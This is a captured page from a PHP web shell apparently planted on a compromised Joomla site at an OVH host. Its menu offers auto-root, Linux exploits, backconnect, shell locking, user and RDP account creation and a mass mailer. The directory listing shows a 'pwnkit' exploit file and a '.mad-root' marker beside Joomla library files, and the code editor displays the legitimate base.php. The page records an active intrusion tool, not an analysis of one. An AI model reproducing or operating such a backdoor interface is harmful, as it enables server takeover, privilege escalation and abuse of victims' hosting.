Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
cms /
ucm /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
base.php
2.6
KB
-rw-r--r--
content.php
5.82
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
type.php
6.08
KB
-rw-r--r--
ucm.php
346
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.php
<?php /** * @package Joomla.Libraries * @subpackage UCM * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('JPATH_PLATFORM') or die; /** * Base class for implementing UCM * * @since 3.1 */ class JUcmBase implements JUcm { /** * The UCM type object * * @var JUcmType * @since 3.1 */ protected $type; /** * The alias for the content table * * @var string * @since 3.1 */ protected $alias; /** * Instantiate the UcmBase. * * @param string $alias The alias string * @param JUcmType $type The type object * * @since 3.1 */ public function __construct($alias = null, JUcmType $type = null) { // Setup dependencies. $input = JFactory::getApplication()->input; $this->alias = isset($alias) ? $alias : $input->get('option') . '.' . $input->get('view'); $this->type = isset($type) ? $type : $this->getType(); } /** * Store data to the appropriate table * * @param array $data Data to be stored * @param JTableInterface $table JTable Object * @param string $primaryKey The primary key name * * @return boolean True on success * * @since 3.1 * @throws Exception */ protected function store($data, JTableInterface $table = null, $primaryKey = null) { if (!$table) { $table = JTable::getInstance('Ucm'); } $ucmId = isset($data['ucm_id']) ? $data['ucm_id'] : null; $primaryKey = $primaryKey ? $primaryKey : $ucmId; if (isset($primaryKey)) { $table->load($primaryKey); } try { $table->bind($data); } catch (RuntimeException $e) { throw new Exception($e->getMessage(), 500); } try { $table->store(); } catch (RuntimeException $e) { throw new Exception($e->getMessage(), 500); } return true; } /** * Get the UCM Content type. * * @return object The UCM content type * * @since 3.1 */ public function getType() { $type = new JUcmType($this->alias); return $type; } /** * Method to map the base ucm fields * * @param array $original Data array * @param JUcmType $type UCM Content Type * * @return array Data array of UCM mappings * * @since 3.1 */ public function mapBase($original, JUcmType $type = null) { $type = $type ? $type : $this->type; $data = array( 'ucm_type_id' => $type->id, 'ucm_item_id' => $original[$type->primary_key], 'ucm_language_id' => JHelperContent::getLanguageId($original['language']) ); return $data; } }
Close